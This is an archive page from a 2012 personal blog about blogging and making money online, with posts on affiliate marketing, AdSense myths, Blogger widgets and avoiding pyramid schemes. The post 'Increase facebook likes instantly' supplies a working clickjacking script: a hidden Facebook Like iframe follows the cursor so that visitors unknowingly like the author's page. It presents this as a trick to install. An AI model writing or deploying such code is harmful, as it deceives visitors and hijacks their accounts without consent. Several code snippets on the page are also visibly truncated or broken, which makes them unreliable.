Why your business needs a website

/ Thursday, December 27, 2012 /

why your small business needs a websiteA lot of people are now buying and selling online, the internet has now become a marketplace and if you are a business man you should ride the wave and don't be left behind. Today I will share why your small business needs a website and its advantages. A business without a website is a loosing business, if you want success you got to adopt to changes, today is the information age where people are mostly online, if your customers are on the internet your shop should also. Building a website is not that expensive, in fact it is cheaper than hiring some support call center agents.

Here are the advantages of having a website for your business

1. Saves money

Compared to other marketing strategy like posting on magazines or in the newspaper, a website is cheaper to make. You will probably spend about $100 depending on the design. A website has unlimited marketing potential, combining it with blogs will help to increase your audience and customers.

2. Improves customer service

Customers are mostly searching and shopping online these days, if you don't have a professionally made website your customers might go to your competitors which have a website. Customers want to know more about the product and the company before purchasing, by putting a FAQ on your site it will improve customer service because all of their questions can already be answered on your site. Product info's, about the company, all of the information can be put to one on a website, this will save time answering emails and calls.

3. Huge marketing potential

Most entrepreneurs don't have a website, their business only survives in friends and customers referrals. By having a website for your small business it will gain audience, not only locally but also internationally. You should advertise your brand online because it is cheaper compared to advertising on TV.

4. A medium to showcase your service

This is also good to show your clients about your service. By providing demonstrations and trusted testimonials you are showing potentials customers of what they can expect from your brand. Add a gallery or a portfolio, you can empress your audience using a website.

5. It saves time

Giving information to your customers takes time. If you put all info's on your website it will saves time explaining about this and that. No more brochures, phone calls, or face to face meeting just to discuss business. Once you have a website it saves time, and time is MONEY.

6. Easy to access for customers

Compared to phone support, a website is accessible 24/7. A customer no longer needs to dial those long telephone numbers all they need to do is use the internet and type in your website's business URL.

More advantages of having a website

  • It easier to network with other products related to your service. E- marketing improves are more people are online everyday.
  • It presents useful information to your customers
  • If your business is using other forms of advertising like billboards, putting your websites URL on the billboard will definitely increase potential customers.
  • Its service is continuous and you can update as much as you want. Services and products can be described in great detail without consumers feeling the pressure and anxiety created from talking to a live representative.
  • A website does not strictly have to revolve around direct advertising. A site can showcase industry news, provide insight, and tell of a companys internal affairs to make the business more noticeable to the public.

what if the internet did not exist

what if the internet did not exist

It supposed to be for military use only, but now everyone uses it. The Internet, our number 1 source for information, the main reason bloggers like me exists has become a basic needs for most people. Based on statistics since 2002 the Internet users around the world has quadrupled to almost 2.3 Billion users. What if it didn't exist? how will mankind adopt a life without Internet technology.

I will share to you my views on this topic because yesterday was suppose to be the end of the world, but it didn't happen and I don't believe on the prediction anyway . For me life without the Internet is like doomsday, because I do some of my hobbies on the Internet like blogging and online gaming.

Here are some facts that might not happen if the internet did not exist.

No Google

Google has been our tool to do a lot of things on the Internet, like research, advertising, business and many more. If it doesn't exist we will go back researching on the Library there will be no easy assignments.

No emails

Ever since it was invented it become one of the most important tool on sending mails because it is fast, accurate, and free. Unlike before, sending mails is a hassle you go to the post office, buy some cute stamps, then it took days and even months for the mail to arrive, sometimes it get lost. If it doesn't exist we are still paying a lot of money for long distance calls and delayed air mails.

No more online videos

Before, we watch videos on DVD and VCD players, since the day it has been created it changed our entertainment lifestyle. If it doesn't exist, we will probably go back recording our favorite TV show on VCR while we are away, sharing videos to your friends and family will be hard, watching our favorite music video will only be available on MTV.

But there is an advantage, there will no more pornography, and video scandals. Most people can only access adult entertainment on Playboy or any other magazines, and it costs money, unlike on the internet it is FREE. There is a saying "the internet is created for porn" I believe in that because majority of web surfers watches porn every minute.

No online games

I kinda like this because I am an  old school gamer. I played Nintendo when I was a little boy up to now I still love classic games like Chrono Trigger and Final Fantasy. If there is no online games, gaming console would be a big hit. The world of warcraft will never rule the world of MMORPG and DoTA addicts will finally come to an end.

But gaming interaction will be limited, you can only compete against artificial intelligence enemies which is sometimes boring because their movements are predicted and you can't taunt them when you kick their ass. Playing against different players ads a spice to your gaming experience.

No more Piracy

Most pirated videos and softwares can be downloaded on the internet. If it didn't exist, the music industry and other companies will earn more because pirates will now have a hard time stealing their products.

No online dating

Lovers will have a hard time looking for each other. Online dating sites has been very popular to old divorced/ separated men and women and if it didn't exist they probably playing golf or chess. The advantage for me is that, online child exploitation will be limited. I can relate to that because I live in a small town where women and girls ages 14 to 100 are looking for an online partner.

Here are more

  • A complete set of Encyclopedia Britannica costs $1200. Cost of online content $0.00
  • In the US alone it employs 1.2 million people directly. A total of 3.05 million people make a living on the internet. They earn a total of $300 billion which is equivalent to the entire GDP of Greece.
  • 65% of people get their news online.
  • Revolutions would take longer. In just one week Egyptians organized 90, 000 people using social networking sites. It only took 18 days to overthrow 30 years of dictatorship.

Is your blog affiliate marketing ready
Affiliate marketing is a kind of relation between the website owner and the business owner. A webmaster is also called a publisher and the business owner is an advertiser. For a business to success they need to advertise, a website is one of the best way to advertise a product, and that is when affiliate marketing enters. Business owners offers commissions to website owners to publish or advertise their products or service for sale. In other words, bloggers help advertisers sell their products to its readers.

If you want to make huge bucks online I suggest affiliate marketing, because many professional bloggers earn a lot from it. But, it is not easy especially for beginners. For you to become successful you need to have a blog integrated and ready for affiliate marketing.

Affiliate marketing payment method

  • Cost Per Sale- a publisher gets paid if he sells a product.
  • Cost Per Lead- an affiliate receives a commission if he leads a customer to that website.
  • Cost Per 1000 impressions- an advertisers pays the publisher if the ads is viewed 1000 times, this is great for blogs that has a high amount of traffic.
  • Cost Per Click- the merchant pays the publisher if a visitor clicks on an ads, this is the same as Google's Adsense.

Website criteria

  • Those with high traffic
  • Your readers trust you and has a high credibility
  • Those sites that has a profitable niches
  • Up to date and always fresh

Tips to make your blog affiliate marketing ready

1. Make your template ads ready

First thing you need to do is to have a blog template ready for advertising. There are a lot of free blog templates out there you can choose. A good template for ads is very important, because it creates an impact on the products you sell, place them perfectly and they will be easily noticed. Always save some space for your ads.

2. Write contents related to your product

This is one of the most important thing to remember when you are into affiliate marketing. Your contents should match with your ads. Example, if you are blogging on how to get fit, you should put ads related to fitness and loosing weight, so that you will have a higher chance of selling that product from your audience.

3. Choose only a handful of great products

A lot of publishers didn't make money through affiliate marketing is because they are promoting and trying to sell too many products. You only need to promote a handful of products and remember that it should align correctly with the topic of your site.

4. Create personal reviews

If you are a blogger with high credibility, writing personal reviews on the product you are selling is a great way to get that extra commissions. Most successful bloggers do that, they review a product to be endorsed to their readers. Be sure to be honest because your credibility is on the line. But limit yourself from too much reviews, only mention it when it is relevant to the conversation and then provide it with links. Your goal as a blogger is to entertain and give useful information to your readers not to strictly sell products or else you will loose readers.

5. Do a research on the demand of the product

If you are going to sell, make sure it sells. If its demand is very low chances are that you cannot sell that product no matter how hard you try. Do a survey on what you're readers likes, create a poll on your website to get a hint on what product or service they want.

6. Stay current and up to date

Affiliate marketing is very competitive and that is why you need to be consistently up to date about your topic and the products you are endorsing. You need to be updated on the latest techniques or else you will be left behind.

7. Choose the right merchant

Promoting a product is also promoting the company and the person behind it. Do your homework, check if the merchant has a good track record. Your credibility is on the line, you give advice to people to buy that product, if they are very unhappy with the product they purchase they probably won't come back for more and you will loose readers. Just make sure you are endorsing a product or service that will satisfy their needs.

8. Track your affiliate marketing campaign

You need to use different product promotion for your campaign, in that way you will know what works and what doesn't. Changing your strategy here and there can dramatically increase your profit. Try changing or experimenting with your ad banners, monitor the behavior of your readers and check where the ads are visible or where it blends perfectly with your website. Most affiliate programs gives you basic statistics on your campaign, so use it.

If you keep this in mind, you will earn a lot of money and not loose a single readers instead they will refer your service and you will increase more visitors and potential customers. A structured plan is always need to become successful in affiliate marketing.

5 Common Adsense Myths

/ Saturday, December 15, 2012 /

beginners adsense tipsI love being a myth buster especially in blogging,and today our topic is about common Adsense myths that bloggers should know. Here, I will explain the myths that confused some blogger about making money with Adsense.

I remember 2 years ago when I was browsing on the Internet on how to get your account approved by Adsense, Instead of finding the right article, I keep seeing these testimonials on making money with Adsense. The hype inspires me to work on applying to make money on Adsense, but after my account was approved, I was kinda disappointed because it is not as easy as it looks. If you want to make money with Adsense you need a lot of work to do. So here are common Adsense myths every blogger must know.

Myth #1. Adsense can make you rich quick

As I have stated in the past, there is no such thing as easy money, and Adsense will not make you a millionaire in an instant. The truth is, there is only a small percentage of bloggers that actually make money from their blog site. It is definitely possible to make some money from Google Adsense Ad units but bear in mind that making money from your blog is commensurate with many factors such as types of advertising, placement of advertising, quality of your content, regular posting, number of articles, SEO, backlinks to your site, number of visitors to your blog to name just a few. You must be consistent on posting your articles on a daily basis. Earning potentials can be based on the number of traffics, the more you have visitors the more chances you make money with Adsense.

Myth #2. Putting more ads the more you earn money

This is false. Most bloggers believe that putting a lot of ads will have a higher chance of earning but the truth is, it might reduce your change of earning. There is a risk that the highest performing Ad units will shift to positions that are less frequently clicked on. If you put on a lot of ads on your site, a savvy visitor will instantly recognize an ad space and will try avoiding it.

Myth #3. Placement of Google Adsense doesn't matter

Actually it does. The placement of ads is very critical if you want to earn more revenue. If you wrongly place an ads, chances are it will not be seen by visitors and will have a lower chance being clicked, but placing it or covering your site with ads will not also earn you more revenue because a visitor did not came into your site to click on your ads. There are ways to put on your ads to make it look professional or blend it on your template, one of the most effective is putting it on the top fold so that visitors can easily see your ads without bothering your visitors while they read .

Myth#4. More traffic means higher earnings

Not exactly, It depends on your blog content. Lets say you blog about poems, you get a lot of comments and visitors, but your adsense revenue is not growing, probably the reason is that niche is not friendly to advertisers. If you are blogging just about anything under the sun, chances of earning a lot from Adsense is very low. You must be specific about a certain topic and it must be a profitable topic.

Myth #5. Google Adsense is the best way to make money

Not necessarily. It is true that Adsense can make you rich, but not every blogger earn a lot from it. Based on facts there are 95% of bloggers making money with Adsense earns just under $30 in one year. Darren Rose of problogger.net, says that he makes a lot of bucks from Adsense, but he made more money with affiliate marketing and currently stopped using Adsense. Most pro bloggers recommends Adsense as the option to make money for beginners, but when you become experienced, blending it with affiliate marketing and other ways to make money will surely skyrocket your income. Chitika and Amazon Affiliates are some alternative ways to make money be sure to check them out.

How Google detect invalid clicks

/ Friday, December 14, 2012 /

how google detect invalid clicks
Most Adsense publisher knows that Google can detect invalid clicks and we all know that the punishment for having invalid clicks is immediate termination of your Adsense account. In today's topic I will share how Google catches someone who tries to cheat his Adsense earnings by doing some invalid clicks.

Beware and try avoiding this. If Google caught you, they will give a warning but sometimes they don't,  so here are the ways Google detects invalid clicks.

1. IP Address

This is the easiest to be recognized. If you are clicking ads that originated from the same IP address then Google will flag your account. Only stupid publishers will do this, because it is the most obvious way to get caught cheating.

2. Click Through Rate ( CTR )

Usually, Click through rate does not exceed 10%. If it does exceed, then the red flag is on you. Having higher that 10% is very suspicious for Google.

3. Cookies

No, this is not the crunchy biscuits. In the old days, we have this Blast Internet card, it is a dial up Internet connection and has no static IP address, you just connect and disconnect you can have a new IP address. If you plan on doing this, think again. Google has set cookies on your computer. They can trace these cookies and see whether they originate from the same computer.

4. Physical Location

Google is really good at tracing invalid clicks, even if you try switching from one computer cafe to another they will still caught you cheating. They are good with tracing traffic origins even if you live in a small town. Google has a very good tracing software and technology.

5. Click Pattern

These are some of the click patters that most cheaters do.
  • Click and run. These are the clickers that click on your ads then run away, this are suspicious because most visitors or readers doesn't visit your site to click ads, they usually stay and surf for a while
  • If the clicker is keep on clicking the same website with the same ads but never clicked on other advertisements.

6. Suspicious Search Engine Ranking

If this website is not indexed by search engines, has no backlinks on any prominent sites, but consistently get high traffic, then it must be suspicious and Google will smell a rat on these sites. Usually this is operated by clicking syndicates operating from third world countries. Their job is to click on ads to a specific site.

7. Web design

Those sites using "click this" on their advertisements are against Google's TOS. If you want to publish ads you should not lure visitors into clicking your own ads.

My 5 Deadly Blogger Mistakes

/ Wednesday, December 12, 2012 /

It has been 3 years since I became active online and been blogging for almost 2 years, yet I am still very new to this blogging kind of stuff and yes I am a newbie. Because I was such a moron I did a LOT of blogging mistakes which I am going to share today .

The first year was fun, because it wasn't that complicated, all I did was have fun blogging and I didn't even know you could make money out of it. Then I decided to make it a full time hobby, and try to increase my ranks and traffic.

Blogging is like an online game to me, I want to level up as much as possible and surpass other bloggers like me. But instead of climbing to the top I started loosing traffic, and rankings because I made some mistakes and I was too lazy to do all those stuff that could boost my traffic and rank.

This is my confession, and this is my deadly blogger mistakes.

Mistake #1.  I Have No Goal

This is the first of my blogging mistake I noticed, I was such an airhead I did blog for no purpose, no goal, I just sat on the computer, post some stuff and leave it. Having a goal is one of the most important thing you should keep in mind and ask these questions to yourself first.

why do I want to blog?
what is my purpose? fame? money? fun?

Mistake #2.  No Promotion

At first I thought, when you start blogging you just write and leave it there, wrong! what is the purpose of blogging if you don't have any readers. If you see my very first blog design most people would probably laugh at it because it sucks and has no social sharing buttons in which you cannot share your post to any social networking sites.

Promotion should be a routine when you are done writing. Share your latest post on your friends, family, use sites like facebook and twitter for spreading your post like a virus.

Mistake #3. Writing for Myself

I did make blogging a diary before. I posted some nonsense stuff like, what is my favorite movie, actors, why I hate this and that and the result was dismal, I didn't have any comments, page view is so low in short nobody gives a crap about my diary.

My life isn't actually boring, but who cares about an average Joe who blogs just about anything that enters his mind. Lets face it, readers come to your site to be entertained or learn something new, they don't care about your whining, how crappy your life is, or why your boyfriend dumps you.

If you want to be a successful blogger always keep in mind of what the readers might like and think only a little about yourself. Your beliefs and opinions should be minimized and not be prioritized in all of your article.

Mistake #4. I Didn't Purchase a Hosting Service

Yes, I admit! I still keep the ".blogspot.com" on my domain name because of that I still suck. As an unemployed blogger, I don't have that much resources spending on my hobbies, including blogging. Actually I want to purchase a hosting service maybe next year. I found some sites that offer a very cheap web hosting in which I can actually afford.

But before I remove the ".blogspot.com" I need to save money for buying a new laptop, the one I am currently using is made in Germany and I have trouble with its settings and keyboard, it is also very slow.

Every blogger or website owner should have its own domain name, blogger.com is really good for newbies like me because it is free, but it still owned by Google. Disadvantage of not having your own domain name is that, Google can delete your blog anytime if they want to.

Mistake #5. My Mind on the Money

This deadly mistake almost make me quit blogging. Since the day I learned how to make money with Google's Adsense, I get so impatient, I was so eager getting my first paycheck. I often check my daily earnings, and when I see it didn't grow I almost quit blogging because some devil just entered my head and start whispering that I don't have what it takes to succeed.

But after almost 5 months quitting, I finally realized that I love doing it, I miss writing, I miss answering comments and emails. My reason for blogging is NOT to make money, it is about learning and sharing what you learned, back to your readers. Because of those blogger mistakes FH2M was born last October, my main reason is to tell the readers that making money online is not easy as it looks.

Easy to install floating sticky bar with social sharing buttons

/ Tuesday, December 11, 2012 /

sticky bar for blogger
Good day my friendships! in today's episode of FH2M I am going to share a blogger widget that will help you navigate your site easier. It is a floating sticky bar with social sharing buttons for facebook, twitter and Google+, I also call this the floating menu bar.

After searching for a cool sticky bar I finally choose this one. I like it because it is very easy to install and you can edit its colors, font style, font size, you can also choose where you want to put it, top or bottom. A demo of this widget can be seen on this blog, I am using it as my menu bar and blend it to my template to make it look cool.

You can also add more features to this sticky bar if you are good with coding. So lets start shall we.

Installation

1. Go to your blogger.com account

2. Go to edit HTML and make sure you backed up your template in case something goes wrong.

3. Go to your blogger layout > Add gadget > HTML/ Javascript and add the codes below and save

<style type='text/css'>
#tnsbar {
background: none repeat scroll 0 0 #000000;
border-bottom: 2px solid #F3F3F3;
box-shadow: 0 2px 7px #000000;
color: #FFFFFF;
font-size: 10px;
height: 30px;
margin: 0;
overflow: hidden;
padding: 0;
position: fixed;
right: 0;
top: 0;
width: 100%;
z-index: 100;
}
#tnsbar a {
color: #FFFFFF;
font-family: 'Droid Sans',sans-serif;
font-size: 12px;
font-weight: bold;
line-height: 30px;
list-style: none outside none;
text-decoration: none;
margin:50px;
}
</style>
<div id="tnsbar">
<div style="float:right;padding:4px;">
<a href='http://twitter.com/share' class='twitter-share-button' expr:data-url='data:post.url' expr:data-text='data:post.title' data-via='dadhust' data-lang='en'></a>
<b:if cond='data:post.isfirstpost'>f
</b:if>
</div>
<div style="float:right;padding:4px;">
<g:plusone size="medium"></g:plusone>
</div>
<div style="float:right;padding:4px;">
<fb:like layout="button_count" show_faces="false" font=""></fb:like>
</div>
<p><a href='#' target='_blank'>Your Text Here</a></p>
</div>

4. Now find this code </body> using CTRL+F and add the following codes above it, only if you haven’t added the Like, Tweet and Google+ button to your blog. If you already have them you don't need to follow this step.

<script src='http://connect.facebook.net/en_US/all.js#xfbml=1'/>
<script src='https://apis.google.com/js/plusone.js' type='text/javascript'/>
<script src='//platform.twitter.com/widgets.js' type='text/javascript'/>

Customize

  • 000000 is the background color of the sticky bar, you can change the color using this color code generator
  • If you like to put it on the bottom screen, change top to bottom.
  • box-shadow: 0 2px 7px #000000 is that tiny box shadow on your bar, you can remove them by erasing it from the script.
  • Change dadhust to your twitter username.
  • Change Your Text Here to your desired message like "hello" or "welcome". In my case, I used that to make a floating menu bar. Here is a sample.
Change this code from this
<p><a href='#' target='_blank'>Your Text Here</a></p>
</div>
To this

<p><a href='http://fromhobby2money.blogspot.com/' target='_blank'>~Home</a><a href='http://fromhobby2money.blogspot.com/p/contact-me.html' target='_blank'>~Contact</a><a href='http://fromhobby2money.blogspot.com/p/sitemap.html' target='_blank'>~Table of Contents</a></p></div>
 Those colored in red are the URL of your chosen menu, change them as you wish.

That is all! I hoped you liked it, if you have questions kindly use the comment form below.

10 Tips to avoid pyramiding scam

10 Tips to avoid pyramiding scamOne of the hottest news right now in the Philippines is the pyramiding scam by Aman Futures. It is very controversial because it scammed over 15 billion pesos from thousands of investors including local government officials.

What is a pyramiding scam?

Pyramiding or Ponzi scheme is illegal to most countries, it is a "get rich quick" scheme in which attracts many people to spend their money and to invest on pyramiding companies.

Its promoter is on top of the pyramid, then recruits investor by promising huge amount of interest in exchange for their investment. Most of them are sweet talker and will talk any kind on bull crap just to get your money. The only way to get your commission is through convincing and recruiting other people to join your down line, the more you recruit the more you will make money.

Tips to avoid pyramiding scam

I have here tips to protect your money and investment from these pyramiding companies.

1. Beware of its "get rich quick" promise

If it's agents are promising a huge kick back on your investments, then you should worry because it is a bait from them.

2. Too good to be true

Besides from the high paychecks they promise, they also offer motorcycles, business and even a car just for you to invest in their company. Another, if they tell you, that all you need to do is invest, and they will do rest.

3. Don't believe in testimonials

A pyramiding company will do all sorts of lies just to get money out of your pocket, and a testimonial is one of their weapons that is very effective on brainwashing people.

4. Background check

If you attend its seminar or orientation, make sure you do your homework and check if its registered or has a license to operate. Check its credibility, innovation, who are the people behind this company, can they be trusted? are they on stock market? and so on...

During orientation you should ask these questions to the speaker

  • Is there a product?
  • Are commissions paid on sale of products and not on registration/entry fees?
  • Is the intent to sell a product not a position?
  • Is there no direct correlation between the number of recruits and compensation?
  • If recruitment were to be stopped today, will the participants still make money?
  • Is there a reasonable product return policy?
  • Do products have fair market value?
  • Is there a compelling reason to buy?

If the answer to all the questions is YES, then the company being evaluated is a legitimate company. But if the answer is NO, then there is a high probability that it is a pyramid scam.

5. Beware of the binary method

Based on the website of DSAP (Direct Selling Association of the Philippines) binary methods are almost like pyramiding, although it is not illegal, it is against the law of direct selling or network marketing. This method is the "left and right" you recruit to your left, and you also recruit on your right, so much for selling. Companies like these focuses more on recruiting rather than selling, so you should beware.

6. No products to sell

Again, pyramiding uses "get rich quick" scheme to attract people to invest. They promise you make money while you sleep.

A legitimate networking company needs to have a product that has the same worth as your investment. Recruiting should be an OPTION not your means to make money, you don't also earn through recruiting.

7. How stable is this company

Check if it has the capacity to pay commissions, do a background check on its finances, or other investments. You should know where your money goes after you invest.

8. Be doubtful if it is like a cult or religion

I remember when I was recruited by a networking company back then, it was so so like a cult or something, when the speaker talks some crap and start demonstrating the product, its members together shouts the word "power" and it was so cheesy, its like they want to brainwash us or something. I have nothing against that company, but they uses the binary method which is recruitment based.

9. Ask questions

Before entering a networking company you should ask these questions, if they have unsure answers then it mus be a scam.
  • Are the rewards you have been promised based on product sales (by either yourself or others you introduce to the scheme)?
  • Are the products genuine products of real value, at a reasonable price and the type of thing that consumers will want to buy time and time again?
10. Check if it has a training program for distributors

A good networking company always takes care the interest of its distributors and customers, then they should have a training for it. Having self improvements training are important to MLM companies in which pyramiding doesn't have.

Actually I have a networking business check out this blog, but I am confident that this is not a pyramiding scam because I checked everything, from its founders, scientists, quality of the products to the finances, everything about it is stable.

Remember and keep in mind that there is no such thing as "get rich quick" unless you won the lottery. People you see get rich in networking has worked their butt out, and did it with pure hard work and perseverance, and an attitude not to quit.

Customize your blogger widget title

/ Friday, December 7, 2012 /

Good day people of planet earth! During this past week I made some changes in some of my blog and I notice a blogger widget title doesn't seem to fit on my designs, that is why I usually leave it blank.

But now we can edit those widgets, by using its unique widget ID, this trick will allow you to change the color background, font color, size and even the font style of your widget title. A demo of this trick can bee seen on this blog, check out my sidebar its all dark black it used to be green before.

The steps are simple just follow the instructions and you can see good results on your blogger template. I will share how to find the the unique blogger widget ID and how to use it to style your blogger title widget.

Here is how

Before we customize our sidebar, let us first look for the ID name of your widget.

Find unique widget ID

1. Log into your blogger.com account select a blog of your choice then preview your blog. You will see a wrench icon on your blog or the blogger edit key just like this one

2. Point your mouse cursor on that image and use right click, then click on copy link address and paste it on a notepad, because we will use them later.

This is a sample on one of my widget, the link address usually look like this

http://www.blogger.com/rearrange?blogID=4286932960589248134&widgetType=HTML&widgetId=HTML16&action=editWidget&sectionId=sidebar

HTML16 is the unique widget ID so keep that in mind. HTML/ Javascripts ID are usually named HTML1, HTML2, and so on. These ID's are sensitive so use them as they are.

padding:8px 0 8px 10px;
font-size:12px;
font-family: Sans-serif, Arial, Helvetica;
font-weight:bold;
text-transform:uppercase;
color:#ffffff; text-shadow:0 1px 0 #fff;
}

CUSTOMIZE

  • Replace "ID" with your very own widget ID, based on our sample it will be replaced by PopularPosts1.

  • 12 is the default font size but you can change them to any size you want.
  • #ffffff is the font color, change them to any color using the color code generator.

3. Hit SAVE and you are all done!

Just repeat the steps for the rest of your widget its very simple most of the time you just copy and paste.

I hope you liked it, don't forget to share!

Cheers!

How to make money from donations

And because those niches are not friendly for advertisers you don't make a living out of it, but you need to pay the hosting bills, electricity, Internet connection etc. which leads us to use donations as a form of funding.

Not all bloggers are dedicated to make money, most of them blog for humanity purposes, and public service. And today I will share two ways to make money through donations.

5. After clicking the "create button" copy the code, then go to your blogger.com account > layout > add gadget > click HTML/javascript > then hit save.

Create a gofundme account

How to make money from donations

If you don't have a blog or a website, you can create your own donation site through gofundme.com. Setting up an account is easy just follow these simple steps.

1. Go to gofundme.com

2. Click "sign up"

3. Enter your email and password or you can log in using your facebook account

4. Enter your goal amount, title, your purpose just like "I need to pay my hosting bills" and that's it you are all set.

Promote your account to facebook to increase your chances of getting donations, send your link to relatives and friends. Remember to keep on updating your funds and say thank you to those generous people who helped you.

13 Reasons I will leave your blog in 20 seconds

/ Sunday, December 2, 2012 /

I have been thinking about this for a long time, on what turn people off on a website and leave in under a minute without checking out its content. What can you do to make them stay? does your site really sucks?

Before I became a blogger I was a web surfer, I just love going to different websites checking them out, if I see something interesting I will bookmark them. If I found some good sites, of course there is always those horrible blogs and website that are worth leaving under 20 seconds. Lets start what makes me leave your site instantly.

1. Pop ups

Again and again pop ups are really annoying, I don't like them it distracts my view and my mood. My laptop is old, and usually pop ups are reasons why it hanged a lot. Ad pop ups like clixsor annoys me, when I see them I instantly closes the whole site.

2. Auto played video

When I want to read, I want it to be silent as possible and sites having those auto played video distracts my reading pleasure. I don't care if it has a great quality content, but when there is such an annoying video popping up from nowhere I don't hesitate leaving and pressing that "x" button.

3. Slow loading speed

I am living in a rural area where Internet is really slow, so when I am visiting a site that took me more than minutes to fully view its homepage, it makes me wanna leave. A blog or website should be fast loading and don't put too much graphics, it affects your loading speed.

4. Badly designed navigation

I have seen this site having very bad navigation but it has great content I even subscribe on its email list but I rarely visit that site because it gives me headaches navigating and also takes around 3 minutes to load because it is a flash based website. A sites navigation needs to be intuitive, descriptive and straightforward.

5. Ads over content

This is one of the mortal sin in blogging that you must not do. Remember that you blog to express yourself and not to publish ads. Also having lots of ads makes your site slower and its not only annoying to the eyes it also tests your patience waiting. Sites having tons of ads instead of contents makes me wanna leave and never come back, ever!

6. Immediate registration demands

Have you visited a site where you can't access its content but have to register first? I have, and my answer was clicking the close button.

7. Auto sound

I hate it when there is noise while reading. If your site has an auto sound or an auto mp3 player I will not come back visiting. I think it is OK but please don't put it on auto play, people get irritated hearing songs that they don't like.

8. Ugly design

First impression lasts, that is why you need to make a beautiful designed website or blog because its design is the first thing that people notice. If your blog is badly designed visitors will leave your site in an instant.

9. Too much flashing, graphics and scrolling kind of shit

If I see a blog that looks like a nightclub I click the close button in just a second. I don't like those flying flashing kind of thing, and even too much scrolling on the side bar, because it makes your site looks childish. Just make it simple, no shit kind of stuff and people will appreciate your sites simplicity.

10. Dead blog

If I see a blog in which its latest posts in from the year 2003 then I won't bother reading or visiting it. A blog needs to be fresh and updated because most people are looking for something new not old.

11. Bad choice of colors

Colors are important when reading, a light-friendly to the eye colors are the ones you should choose when designing your blog. Do not use dark colors on blog post color backgrounds, it makes me cry while reading.

12. Poor spelling and grammar

If your site is about teaching some stuff then you should learn how to be good in grammar, you don't need to worry about spelling if you activate spelling checker. Having poor grammar confuses your readers and makes them wanna leave and never come back again.

I am not really good in English,  but I am trying my best to express my thoughts on a foreign language

13. Boring

If you are blogging then make it interesting. Some sites are really boring, no life, no clarity on what it is about, author also boring, they just write on whats on their mind and that is all, no about me page, no popular posts, no comments, in short no no no no one will like a boring blog like that! and you are just wasting your time blogging, just watch TV instead.

Increase facebook likes instantly

/ Saturday, December 1, 2012 /

increase facebook likes instantlyDo you have a problem increasing your facebook likes?, then do not worry if you have low facebook likes it doesn't mean your blog site sucks, some people are just lazy clicking the like button even though they like your site. And because of that I will share to you a sneaky trick to let your visitors like your site instantly.

But before that I will show you something, a funny yet true illustrations about why some people get so many likes and some don't.

increase facebook likes instantly

As you can see on the left and right, those girls with weird eyes wears a different outfit. On the right has many likes, friend request and notifications on the other, has only one notification.

In my observation 90% of those who like on the right side are male, because men love bikinis and those on the right... well she probably just receive a game invitation request.

increase facebook likes instantly

This happened to me many times, I posted a joke and only 1 person liked it, then a girl friend of mine who is actually hot shared it, she got more than a 100 likes, 30+ friend request and a lot of comment. If I am some hot chick wearing short skirt wearing kinky dresses in my blog post author biography and blogging the same topic, then I would probably have tons of likes and comments.

Anyway, lets go back to the main topic. Now I will share to you the sneaky trick to increase your facebook likes instantly. It is sneaky because when you install this trick, it lets your visitors like your site wherever they click on your blog. The reason for that is there is an invisible click button that follow your mouse cursor.

Installation

1. As usual go to your blogger template

2. Edit HTML and click on expand widget. Make sure your backed up your template in case you made some mistakes editing.

3. Search for this code using CTRL+F </head> and paste the below script above it.

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">

<script type='text/javascript'>

jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
}
function ClickJackFbShow(){
jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
}
</script>

 4. Now search for the </body> tag and paste the code below above it.

<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>

5.  Just replace Fanpage URL Link with your own facebook fan page URL address. Then hit SAVE template. Refresh your page and you will notice something different about your mouse cursor.

NOTE: this trick will affect your blog when selecting or highlighting text, you cannot copy or paste a text or word if you apply this trick. And also it might affect your blog widget acting weird but if there is no problem you can proceed.

5 ways to make a living on MMORPG games

/ Thursday, November 29, 2012 /

Money is needed for almost anything, and even on the virtual world a virtual currency does exist which involves real money. MMORPG has become one of the most successful online game genre today, games like world of warcraft, Ragnarok and Diablo III are still being played by millions of gamers.

Most of you probably doesn't know, but there are these so´-called "pro gamers", they are celebrities on the gaming world, they earn a living by just playing online games, mostly MMORPG, some of them are sponsored by big companies and compete on world cyber games. They are like the athletes of online gaming competition, sometimes they represent their own countries.

Besides earning money on cyber games competition there is more. Lets turn your online game hobby into money! here are 5 ways to make a living on MMORPG games .

1. Blogging about your chosen online games.

Create a how to guide, item guides for beginners and tricks, this will surely make you money. If you are good in a game just like DoTA, create some new strategies, hero reviews and item combinations. After you established a blog, then apply for Adsense to make extra income.

2. Affiliate Programs.

If you are a successful blogger/gamer then these techniques will surely make you earn more money. Affiliate programs are one of the best way to make money especially if you are into blogging. If you are a publisher on gaming then try these sites, it will surely help you make more bucks.

3. Account selling.

